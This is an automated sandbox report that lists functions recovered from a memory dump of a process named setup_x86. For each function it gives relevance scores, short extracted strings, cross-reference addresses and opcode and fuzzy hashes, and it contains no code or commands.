Opcode ID: c1ed836d1f3616340614fc9767dc4007aead322cae35a790bab30a7445f9da86
Instruction ID: a357b6faa138f8efbaa851e46b37ec056015daf76f18ab355b75424adaffaa7b
Opcode Fuzzy Hash: c1ed836d1f3616340614fc9767dc4007aead322cae35a790bab30a7445f9da86
Instruction Fuzzy Hash: A2A12531A0F6CA4FE752AB3448B56A47FE0EF47320F0902FAC549DB0A3DA1C590A9752

Function 00007FFD348C0E28 Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

HA{4, xrefs: 00007FFD348C2B34
HA{4, xrefs: 00007FFD348C2B8D

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: HA{4$HA{4
API String ID: 0-3778477249
Opcode ID: 008d2319d83dd3abe355290faf982792f04e108f04834dc442eee732338cdb54
Instruction ID: e7ff999ef82c0025bcb5b00f1f04d90db9bed85b52889cc9220b95dfd7627e89
Opcode Fuzzy Hash: 008d2319d83dd3abe355290faf982792f04e108f04834dc442eee732338cdb54
Instruction Fuzzy Hash: 7171E732E0CA494FD759DB6C94A56B9B7E1FB99311F04427FD04ED3291DE38AC428780

Function 00007FFD348D7EC0 Relevance: 2.8, Strings: 2, Instructions: 256COMMON

Download Yara Rule

Strings

", xrefs: 00007FFD3491C940
[F_L, xrefs: 00007FFD3491C96F

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: "$[F_L
API String ID: 0-3853892011
Opcode ID: bd88f591ff08cb5a6ef570bef58acebea95cbb4f1a21026c6c14b622c3ce9f46
Instruction ID: 09e3b6905be30acf0958d680e4e8b9afc734c570d16a0c008bd63063597ad917
Opcode Fuzzy Hash: bd88f591ff08cb5a6ef570bef58acebea95cbb4f1a21026c6c14b622c3ce9f46
Instruction Fuzzy Hash: 1571C472B1CA494FDB58EA1C94A557573D2EFA9314B1441BED44EC7296DE28FC02C780

Function 00007FFD348C7A21 Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

[b(, xrefs: 00007FFD348C7B42
[b(, xrefs: 00007FFD348C7AAD

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: [b($ [b(
API String ID: 0-226944382
Opcode ID: 6033b485bc59b94b6483594b70719cf4ef08cd6e87fb02d99c6f0ee13b98806d
Instruction ID: 9330cd76729f7f08340c0cf844e38244c056d7fcd2b36c1532dce74dd28bec89
Opcode Fuzzy Hash: 6033b485bc59b94b6483594b70719cf4ef08cd6e87fb02d99c6f0ee13b98806d
Instruction Fuzzy Hash: 0151F350B0AA8B0FE795EBA4A5762B9BBD2AF42210B0844FAD19DD70D3DE3C7D018701

Function 00007FFD348D5AB3 Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

8_b(, xrefs: 00007FFD348D5ADE
8_b(, xrefs: 00007FFD348D5AF0

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: 8_b($8_b(
API String ID: 0-208723009
Opcode ID: a04b7ded185c078d2a99172df65422b03418b86e0dbe509f53e40293502d65ae
Instruction ID: 9dc76dcdc133ecf4abbd5fd907b5a64662676769de2c101de66901a4fdad26c6
Opcode Fuzzy Hash: a04b7ded185c078d2a99172df65422b03418b86e0dbe509f53e40293502d65ae
Instruction Fuzzy Hash: E841D931B0AA498FDB98EF7884A95B977D1EF56320B1045BED00AC7196DE3D9C42CB40

Function 00007FFD348D90B8 Relevance: 2.6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

Strings

G_H, xrefs: 00007FFD34905B3F
x6b(, xrefs: 00007FFD34905AAD

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: x6b($G_H
API String ID: 0-2199097026
Opcode ID: 18e3537c21363ac19e57cec614489475c8669a1b53092b7fc8ab77d1c1c80572
Instruction ID: 615a8af6cb3c0a473bb2bf0756ff94e8260f490dac5272a9d426e73ca3968ad8
Opcode Fuzzy Hash: 18e3537c21363ac19e57cec614489475c8669a1b53092b7fc8ab77d1c1c80572
Instruction Fuzzy Hash: C231D761B0DD0A4FFBE8EB5C54E967522C1EFAA361B14007ED60EC3296DC1DEC828350

Function 00007FFD348C2E18 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

xab(, xrefs: 00007FFD348C2E45
pab(, xrefs: 00007FFD348C2E8C

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: pab($xab(
API String ID: 0-1285336246
Opcode ID: 794fb20bc50578d7dd667986509cd9fbff96695b2f3817881ffd3e5ff1728a88
Instruction ID: f5a122d2d670ad020bde38b25732bac4af0b4ec03fa1b321d6ea6ea0c295a9aa
Opcode Fuzzy Hash: 794fb20bc50578d7dd667986509cd9fbff96695b2f3817881ffd3e5ff1728a88
Instruction Fuzzy Hash: E831E860B1DB856FD315ABB848671AABBD5EF86310F1401BEE449C31D3DD686C028682

Function 00007FFD348C0E30 Relevance: 2.6, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

xab(, xrefs: 00007FFD348C2E45
pab(, xrefs: 00007FFD348C2E8C

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: pab($xab(
API String ID: 0-1285336246
Opcode ID: 82cc5003be233d889be29a65120f35d7bf36614270cc6467a7787d6407f10637
Instruction ID: 5cc51bd7fe18b50eb7e65cf1136435b0ae2e7b33856775af5c157c75cae025b7
Opcode Fuzzy Hash: 82cc5003be233d889be29a65120f35d7bf36614270cc6467a7787d6407f10637
Instruction Fuzzy Hash: 8631F760B1DB456BD315ABB8882A1BABBD5EF86300F1401BEE449C31E3ED687C028642

Function 00007FFD348C9E7C Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

`7b(, xrefs: 00007FFD348C9F76
P7b(, xrefs: 00007FFD348C9F40

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: P7b($`7b(
API String ID: 0-2696476966
Opcode ID: 62e521d66978eb58dc5505c00ae0e4072cc8c551cef2bb78be5728149c90d13f
Instruction ID: 4e7ef3c06a86396c8f70127cd41f7842bee7791f837ec9165fba8dc1d1beb552
Opcode Fuzzy Hash: 62e521d66978eb58dc5505c00ae0e4072cc8c551cef2bb78be5728149c90d13f
Instruction Fuzzy Hash: 8E313270604A4A8FDB85DF58C4A8BE977E1FF59310F1845BAD81DC7266DA38AC42CB00

Function 00007FFD348C7910 Relevance: 2.6, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

(, xrefs: 00007FFD348C7922
[b(, xrefs: 00007FFD348C7986

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: [b($(
API String ID: 0-2592160707
Opcode ID: 173fef5ee3b4f58926099a14d8d2eae2bf1f55fea14c40fa3a0ef75c323dd5b7
Instruction ID: adb6f8f210dfd834005bd4429b969c29e5304a1ffdb0ade877a44a5ebb00ca92
Opcode Fuzzy Hash: 173fef5ee3b4f58926099a14d8d2eae2bf1f55fea14c40fa3a0ef75c323dd5b7
Instruction Fuzzy Hash: 9621E7A2A0FA860FE792D77854692A5BBE1EF52134B1845FBD048C7097D92CAC4DC741

Function 00007FFD348F59D0 Relevance: 2.0, Strings: 1, Instructions: 739COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD348F5D39

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 2acbe82eb62724253a306ce22caa04fc0d18e24a26d66e450a80490ef53db89d
Instruction ID: 71d3fcf580f633d4d30a25e523405e45cd5b18be2f938c9f5ecc9bc190be6885
Opcode Fuzzy Hash: 2acbe82eb62724253a306ce22caa04fc0d18e24a26d66e450a80490ef53db89d
Instruction Fuzzy Hash: 45221331A1DA494FE7A8DB18D4A16B5B3E1FF96310F14457EC18EC3693DA38BC468781

Function 00007FFD348C3E99 Relevance: 1.6, Strings: 1, Instructions: 371COMMON

Download Yara Rule

Strings

6b(, xrefs: 00007FFD348C40BF

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: 6b(
API String ID: 0-1774664075
Opcode ID: 4adc8d7dec2f7a99583f61156c7325132b05c6a96c98c790b918301ca75b4a3f
Instruction ID: fa6c79d285b2280c318f19fdc0d219baaccb7d5a09c436eb778e21a2ccd268e9
Opcode Fuzzy Hash: 4adc8d7dec2f7a99583f61156c7325132b05c6a96c98c790b918301ca75b4a3f
Instruction Fuzzy Hash: 22C11531B1C64A4FEB94DB2888A56B9BBE1FF5A310F04057BD45EC72D2DA2CAC46C740

Function 00007FFD348DB727 Relevance: 1.6, Strings: 1, Instructions: 364COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD348DB96B

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 01923bb88d3e5ca6cbd023a2ea92f41aa29f50f74c364984cf0a342deabb1526
Instruction ID: d881b661f2afeada3c0a16735da49f4afa1db2b190f59f8e7c3c53b537537a4e
Opcode Fuzzy Hash: 01923bb88d3e5ca6cbd023a2ea92f41aa29f50f74c364984cf0a342deabb1526
Instruction Fuzzy Hash: 29B19371719E458FDB98EF6CC0A19A577E1FFA931070442AAD04EC7696DE38F845CB80

Function 00007FFD348D9038 Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

sz4, xrefs: 00007FFD348EECAC

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: sz4
API String ID: 0-598066146
Opcode ID: 6058e45681ac3d514e1554d55fdfed95355206507c990d3401bd839875afab9d
Instruction ID: 75a6404491b6923d21ee975f19b28802c69886383055355d67cb1f1d9bddf5a1
Opcode Fuzzy Hash: 6058e45681ac3d514e1554d55fdfed95355206507c990d3401bd839875afab9d
Instruction Fuzzy Hash: A6B18271B1894D8FDF98EF5CD8A8EA977E1FF59310B0801A9E45DD72A1DA24EC41CB40

Function 00007FFD348DB774 Relevance: 1.6, Strings: 1, Instructions: 354COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD348DB96B

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: f71fe48994bcc745c38cbf54a26ceb2d8931fd276bf258c53abebb10a2ebbc56
Instruction ID: 61bc66e3275b92b960d7a93e75626b3090f520389a82fef121ff748e5935efff
Opcode Fuzzy Hash: f71fe48994bcc745c38cbf54a26ceb2d8931fd276bf258c53abebb10a2ebbc56
Instruction Fuzzy Hash: 55B17271719E458FDB98EB68C0A19A577E1FFA9300B1445AED04EC3697DE38F846CB80

Function 00007FFD348DA02D Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

`c(, xrefs: 00007FFD34914335

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: `c(
API String ID: 0-1821392215
Opcode ID: bf8684d1939eb14cd2e4f1bbe1d6824a831cc1190ceed5ef24ee857f9f94b1ce
Instruction ID: 9e9acc1743c614bb00398dc7ba580c648ea0cc818541e872ea80af95860b5496
Opcode Fuzzy Hash: bf8684d1939eb14cd2e4f1bbe1d6824a831cc1190ceed5ef24ee857f9f94b1ce
Instruction Fuzzy Hash: 09912871B0CA468FE7589A5C98A55B977D0EF9E320B0402BED58AC7197DD2CB843C391

Function 00007FFD348D7E9F Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

x6b(, xrefs: 00007FFD349075C7

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: x6b(
API String ID: 0-3445059474
Opcode ID: 06835620391ff35be6b2db5ead7ca169f2a955ea666c4e304f8f7b4ce16b219e
Instruction ID: ac7229b466da4f9ea3119d9de61a06133b7e444455d543243edf47aaa0fd65bd
Opcode Fuzzy Hash: 06835620391ff35be6b2db5ead7ca169f2a955ea666c4e304f8f7b4ce16b219e
Instruction Fuzzy Hash: 67A18230A18A088FDB98EF5CC895AA877E1FF5A314B1001ADD54AC72A6DE35FC42DB51

Function 00007FFD348DA068 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

`c(, xrefs: 00007FFD34914335

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: `c(
API String ID: 0-1821392215
Opcode ID: 07708bb1354788ff943356c0e61f2ff5f520d3aa46e31deec415ae0e03a4fcc2
Instruction ID: e9bc8ae1aa6870a4c36712945742d4e8145b09773b5e84f9f7afb25f7860a8b5
Opcode Fuzzy Hash: 07708bb1354788ff943356c0e61f2ff5f520d3aa46e31deec415ae0e03a4fcc2
Instruction Fuzzy Hash: FC912971B0CA468FEB589A5C98A66B977D1EF9E310F14027ED54AC3187CD1DBC438391

Function 00007FFD348CCFFB Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

^, xrefs: 00007FFD348CD039

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: ^
API String ID: 0-1590793086
Opcode ID: 79f23ff3d547fca2b7e2fd27d23ce1fdb776bacafca617c789db9131ad5009e9
Instruction ID: 8100e6c9e0dda6989f4f0b6c41243f9bc457ab3e559689ca3793da4090132db8
Opcode Fuzzy Hash: 79f23ff3d547fca2b7e2fd27d23ce1fdb776bacafca617c789db9131ad5009e9
Instruction Fuzzy Hash: E8918262A0E6955FE712BBFC64751EA7FA09F42328B0C01FBD189DB093ED2C68468355

Function 00007FFD348C0E38 Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

HA{4, xrefs: 00007FFD348C30E4

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: HA{4
API String ID: 0-3821214897
Opcode ID: 1d3068b315c6e8e3273ddc136bbea1c2a100d3c0c0b449250c8994cb68cddbb0
Instruction ID: 4b448e35d263ab754f69934d84224c026e3c4c10956ea02cf09fd554b174e9c1
Opcode Fuzzy Hash: 1d3068b315c6e8e3273ddc136bbea1c2a100d3c0c0b449250c8994cb68cddbb0
Instruction Fuzzy Hash: 45711932B1CB484FDB58DB5C98956BAB7E1EB99320F00427FE44DD3291DE75AC068781

Function 00007FFD34913D68 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

hc(, xrefs: 00007FFD3491457F

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: hc(
API String ID: 0-2837714360
Opcode ID: 62207c4072516edd71fce1482c987e89975e75b8d809143694e849b03854ffbf
Instruction ID: e7ae9f3ef37def5ce3ed88f17083be2e1234df2d3cc76290898ad874c6ea6229
Opcode Fuzzy Hash: 62207c4072516edd71fce1482c987e89975e75b8d809143694e849b03854ffbf
Instruction Fuzzy Hash: 13719261A1CF494FE7A89B6884656B2B7E1EFA9314F04457FD08FC3196DE38B8068781

Function 00007FFD348C3FB2 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

6b(, xrefs: 00007FFD348C40BF

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: 6b(
API String ID: 0-1774664075
Opcode ID: 239a60355694be199b283ec79a7157b17d471124b44af3144487409abe7e0c8f
Instruction ID: d731dd641f8ca70ea1a735c49366bec4f5bc47b74d80df258a9eb397828d6fe8
Opcode Fuzzy Hash: 239a60355694be199b283ec79a7157b17d471124b44af3144487409abe7e0c8f
Instruction Fuzzy Hash: 5B81E471A0864A8FDB94EF58C8A56B9B7E1FF59310F14417BD41AD72D2DA38A842CB40

Function 00007FFD348D8F51 Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

$H_H, xrefs: 00007FFD349017C2

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: $H_H
API String ID: 0-901362484
Opcode ID: 5cf0d3f038dc99b4aaff742e40f6965df8cf766209b0c339fa969291cb451d80
Instruction ID: d98f24ebb6d21cf60c41a2efd4606eaaf5dddebe729c4429e01bcf64b01d73b9
Opcode Fuzzy Hash: 5cf0d3f038dc99b4aaff742e40f6965df8cf766209b0c339fa969291cb451d80
Instruction Fuzzy Hash: C1512735B1CA0A4FE7A8960CA4A657573D1EFD6764B14037FE84EC329ADD2ABC4342C1

Function 00007FFD348CDA15 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

X7b(, xrefs: 00007FFD348CDB1F

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: X7b(
API String ID: 0-1822927515
Opcode ID: 0c881b0459174e51f2f96c2cc431f3f7306217b36308faa538564d236625fc37
Instruction ID: 0276120d8a91bf2017cdc9e06fb14834742d90851e75e206e4facd141232c023
Opcode Fuzzy Hash: 0c881b0459174e51f2f96c2cc431f3f7306217b36308faa538564d236625fc37
Instruction Fuzzy Hash: 0D61297160EB8A8FD756DB7488652A97BE0FF46320F0806EEC449CB1E2DA6C5C46C751

Function 00007FFD348C4008 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

6b(, xrefs: 00007FFD348C40BF

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: 6b(
API String ID: 0-1774664075
Opcode ID: a1c8e539633787841becf9b9c4e85ac3bea3c61e149cb4f5976f6d3e7f334900
Instruction ID: 43d4b565793fe44bf812d245bf5272d249a016e72e2a6a9c977dbb7cdeb3cbdf
Opcode Fuzzy Hash: a1c8e539633787841becf9b9c4e85ac3bea3c61e149cb4f5976f6d3e7f334900
Instruction Fuzzy Hash: 83618271B08A0A8FEB94DF58C4A56B9B7E1FF99310F14413AD41ED72D5DB38A842CB40

Function 00007FFD348D6B00 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

`_b(, xrefs: 00007FFD348D6BAD

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: `_b(
API String ID: 0-536666189
Opcode ID: d2c2c244b41c9007ab8b6b85dd362252789c8207534e0253ae0a79c3b9e9d3f9
Instruction ID: c979593831c2a4affde444256138d4a9846100dd64914748e8d7a68e09807d7b
Opcode Fuzzy Hash: d2c2c244b41c9007ab8b6b85dd362252789c8207534e0253ae0a79c3b9e9d3f9
Instruction Fuzzy Hash: 05413B21B1FA8E0FE755BB6864B51BA7BD0EF8B310B0402BBD54DD71A3DD1C68468381

Function 00007FFD348D4842 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

_b(, xrefs: 00007FFD348D497D

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: _b(
API String ID: 0-2229844080
Opcode ID: e749d577789c6a9f078c50e9cca4446bc2edcdc1ac07fef71c81bd90912465d7
Instruction ID: eb133387d2ac561257d8e24d41d2be24fe9a3477c34614006c98e230ccc3495a
Opcode Fuzzy Hash: e749d577789c6a9f078c50e9cca4446bc2edcdc1ac07fef71c81bd90912465d7
Instruction Fuzzy Hash: 9C51D126A4F7C91FE762977448651E9BFF0EF47210F0902FBD588CB0A3DA1C290A9752

Function 00007FFD348C5DB0 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

PK_^, xrefs: 00007FFD348CF401

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: PK_^
API String ID: 0-662081527
Opcode ID: 1164a023a22134c575d423aa598a7fbffc29a9dd4061b4877d23f3e82ee28caa
Instruction ID: 3fc6d3b2e463f9a399a3042b782d74b995f382a13d860212e750ed8ac9c42b0f
Opcode Fuzzy Hash: 1164a023a22134c575d423aa598a7fbffc29a9dd4061b4877d23f3e82ee28caa
Instruction Fuzzy Hash: C6510521A0D6891FF762977858615E9BFA0EF83360F0802BBD698C70D7DD1D690A9782

Function 00007FFD348DB5FA Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

x6b(, xrefs: 00007FFD348DB716

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: x6b(
API String ID: 0-3445059474
Opcode ID: 590912bf9d553022243ed66b71abdb7d7de5f264ccd0647b0340fae150ab6402
Instruction ID: 5970bc8199b293404651060ea2c183bc76ee13d2da2bb134b4bfd8a91aff71e6
Opcode Fuzzy Hash: 590912bf9d553022243ed66b71abdb7d7de5f264ccd0647b0340fae150ab6402
Instruction Fuzzy Hash: DC41F822B0EA850FEB65AB6CA4B55A937E0EF96710B0802BAD14DC71D7DD2CFC018390

Function 00007FFD348D90A3 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

x6b(, xrefs: 00007FFD34904308

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: x6b(
API String ID: 0-3445059474
Opcode ID: 5f50ab37f322430142800c237e51af4fc26adc76abe4e795a4c1ca79ad6bfe7d
Instruction ID: 7c4115d2db1da82e9e109137f368a63917f890d2ffaaefbea545b0027d6428f7
Opcode Fuzzy Hash: 5f50ab37f322430142800c237e51af4fc26adc76abe4e795a4c1ca79ad6bfe7d
Instruction Fuzzy Hash: AA41393070DA0A8FE768EB6C98A5A7637C5EF56310B1401BCD54EC319AEE18FC529291

Function 00007FFD348D1E5C Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

`^b(, xrefs: 00007FFD348D1EED

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: `^b(
API String ID: 0-507415162
Opcode ID: 2e2ec6b36824103dc28a573b0618f83fbcb4b70547e820e3fb7d5a0afa062766
Instruction ID: b3567e27ae921c91f128c0b742b6ad04ed5e712a736d5d4c53c14bde8c062c0a
Opcode Fuzzy Hash: 2e2ec6b36824103dc28a573b0618f83fbcb4b70547e820e3fb7d5a0afa062766
Instruction Fuzzy Hash: 4641C131A4E7CE4FD7569B6488654EA7FB1EF43310F0902EBD848CB193DA6C590AC792

Function 00007FFD348DC49C Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

``b(, xrefs: 00007FFD348DC52D

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: ``b(
API String ID: 0-818627296
Opcode ID: e9b4094c8abb54e7b70f9b7ca1bed3d07be74d8576ebb6ef6edbefa5796ffd82
Instruction ID: fcb6dd357104921b7b88a672096fde4938b9c1aa7e1e6add3fac350f4859f1f7
Opcode Fuzzy Hash: e9b4094c8abb54e7b70f9b7ca1bed3d07be74d8576ebb6ef6edbefa5796ffd82
Instruction Fuzzy Hash: 9F41037294E7C91FE752AB7448250E97FB4EF43210F0902FBE589CB093EA2C194AC752

Function 00007FFD348D6D0D Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

x6b(, xrefs: 00007FFD348D6D86

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID: x6b(
API String ID: 0-3445059474
